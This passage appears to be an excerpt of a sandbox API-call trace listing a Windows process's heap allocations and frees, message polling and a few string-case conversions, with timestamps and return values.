0x2e50b00 [0142.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0142.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0142.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0142.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0142.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0142.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0142.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0142.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0142.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0142.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0142.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0142.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0142.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0142.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0142.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0142.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0142.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0142.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0142.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0142.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0142.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0142.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0142.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0142.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0142.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0142.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0142.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0142.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0142.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0142.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0142.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0142.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0142.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0142.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0142.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0142.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0142.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0142.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0142.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0142.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0142.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0142.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0142.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0142.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0142.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0142.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0142.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0142.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9786e0 | out: hHeap=0x970000) returned 1 [0142.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0142.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0142.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0142.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0142.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e80330 [0142.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0142.376] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0142.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0142.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0142.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0142.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0142.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0142.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0142.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0142.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0142.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0142.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0142.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0142.376] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0142.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0142.376] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0142.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0142.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0142.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0142.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0142.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0142.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0142.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0142.377] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0142.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0142.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0142.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0142.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0142.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0142.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0142.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0142.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0142.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0142.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0142.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0142.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0142.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0142.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0142.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0142.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0142.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0142.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0142.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0142.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0142.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0142.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0142.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0142.378] CharLowerBuffW (in: lpsz="byte[288]", cchLength=0x9 | out: lpsz="byte[288]") returned 0x9 [0142.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0142.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0142.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0142.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0142.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0142.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0142.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0142.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0142.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0142.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0142.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0142.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0142.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0142.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0142.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0142.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0142.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x120) returned 0x9786e0 [0142.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0142.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0142.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0142.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0142.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0142.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0142.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0142.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0142.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0142.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0142.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0142.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0142.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0142.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0142.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0142.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0142.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0142.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0142.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0142.379] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0142.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0142.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0142.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0142.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0142.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0142.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0142.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0142.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0142.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0142.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0142.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0142.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0142.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0142.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0142.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11a) returned 0x2e558d8 [0142.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0142.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0142.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11a) returned 0x2e55a00 [0142.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0142.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0142.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0142.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0142.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0142.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0142.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0142.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0142.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0142.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0142.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a00 | out: hHeap=0x970000) returned 1 [0142.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0142.381] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0142.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0142.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0142.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0142.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0142.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0142.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0142.381] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0142.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0142.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0142.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0142.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0142.381] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0142.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0142.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0142.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0142.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0142.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0142.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0142.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0142.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0142.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0142.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0142.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0142.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0142.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0142.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0142.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0142.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0142.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0142.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0142.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0142.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0142.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0142.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0142.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0142.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0142.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0142.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0142.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0142.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0142.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0142.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0142.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0142.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0142.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0142.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0142.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0142.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0142.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0142.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0142.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0142.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0142.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0142.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0142.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0142.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0142.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0142.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0142.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0142.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0142.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0142.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0142.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0142.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0142.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0142.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0142.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977908 [0142.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0142.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0142.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0142.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0142.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0142.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0142.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0142.384] RtlAllocateHeap 